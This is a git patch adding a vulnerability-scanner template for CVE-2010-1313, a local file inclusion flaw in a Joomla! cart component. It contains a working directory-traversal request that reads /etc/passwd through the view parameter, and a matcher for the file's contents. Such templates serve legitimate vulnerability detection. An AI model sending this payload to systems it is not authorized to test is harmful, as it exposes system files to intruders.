From ec15d47e3ab0d3a7e5017e37b39073455424f56d Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Fri, 3 Sep 2021 07:42:37 +0700 Subject: [PATCH] Create CVE-2010-1313.yaml --- cves/CVE-2010-1313.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/CVE-2010-1313.yaml diff --git a/cves/CVE-2010-1313.yaml b/cves/CVE-2010-1313.yaml new file mode 100644 index 0000000000..46a6e36549 --- /dev/null +++ b/cves/CVE-2010-1313.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1313 + +info: + name: Joomla! Component Saber Cart 1.0.0.12 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Seber Cart (com_sebercart) component 1.0.0.12 and 1.0.0.13 for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12082 + - https://www.cvedetails.com/cve/CVE-2010-1313 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200